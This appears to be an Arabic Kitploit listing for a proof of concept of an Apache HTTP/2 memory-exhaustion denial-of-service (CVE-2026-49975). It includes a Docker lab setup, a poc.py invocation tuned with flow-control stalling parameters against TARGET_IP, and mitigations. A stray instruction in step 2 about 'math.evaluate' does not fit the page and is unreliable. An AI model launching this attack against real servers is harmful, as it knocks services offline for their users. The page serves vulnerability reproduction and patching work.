Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-49975 — HTTP2-Bomb | Kitploit
أدوات/GitHubGitHub/0xc03307b/cve-2026-49975
تحليل الثغرات الأمنيةالاستغلالأمن الويبالاختبار العشوائياختبار الاختراق
GitHub0xc03307b/cve-2026-49975

CVE-2026-49975

HTTP2-Bomb

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-49975 قنبلة HTTP/2

★ CVE-2026-49975 إثبات المفهوم لقنبلة HTTP/2 ★


نظرة عامة

CVE-2026-49975 هو ثغرة حرمان من الخدمة (DoS) في خادم Apache HTTP. تحدث الثغرة في مسار معالجة طلبات HTTP/2، حيث يمكن دمج حقول cookie المتعددة دون أن تُحتسب بشكل صحيح ضمن LimitRequestFields. من خلال إرسال طلب HTTP/2 صغير مشفّر بـ HPACK والذي يتوسع إلى العديد من حقول cookie، يمكن للمهاجم إجبار الخادم على تخصيص ذاكرة بشكل متكرر أثناء دمج رؤوس Cookie. يمكن للمهاجم بعد ذلك استخدام التحكم في تدفق HTTP/2 لتأخير إرسال الردود، مما يبقي التدفقات المتأثرة مفتوحة ويمنع تحرير الذاكرة المخصصة.


الإصدارات المتأثرة

الفئةالإصدار
قابلة للثغرةApache HTTP Server 2.4.17 ≤ الإصدار ≤ 2.4.67
مصححةApache HTTP Server 2.4.68 أو أحدث

التأثير

  • حرمان عن بعد من الخدمة (DoS)
  • استهلاك مفرط للذاكرة
  • تأخير أو فشل معالجة طلبات المستخدم العادية

البيئة

قم ببناء وتشغيل بيئة خادم Apache HTTP القابلة للثغرة.

root@kitploit:~
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975

إثبات المفهوم (PoC)

بعد تشغيل البيئة القابلة للثغرة، اتبع الخطوات أدناه لإعادة إنتاج الهجوم.

الخطوة 1. مراقبة استخدام ذاكرة الخادم

root@kitploit:~
docker stats cve-2026-49975

مثال على المخرجات:

root@kitploit:~
CONTAINER ID   NAME             CPU %   MEM USAGE / LIMIT     MEM %
xxxxxxxxxxxx   cve-2026-49975   0.5%    35.2MiB / 8.0GiB      1.7%

الخطوة 2. تشغيل إثبات المفهوم لقنبلة HTTP/2

أرسل التعبير التالي إلى math.evaluate (على سبيل المثال، من خلال إدخال الحساب في التطبيق).

root@kitploit:~
python3 poc.py \
  --host TARGET_IP \
  --port 10081 \
  --connections 10 \
  --streams 100 \
  --refs 4091 \
  --initial-window 0 \
  --hold 300 \
  --drip-interval 2 \
  --drip-bytes 1

الخطوة 3. تأكيد النتيجة

تحقق من زيادة استخدام ذاكرة حاوية Apache وبقائها مرتفعة أثناء إبقاء تدفقات الهجوم مفتوحة.

التخفيف

  • قم بترقية خادم Apache HTTP إلى الإصدار 2.4.68 أو أحدث
  • فكر في تعطيل HTTP/2 مؤقتًا إذا كانت الخدمة لا تتطلبه

التحليل

  • KR:
  • EN:
تنزيل الأداة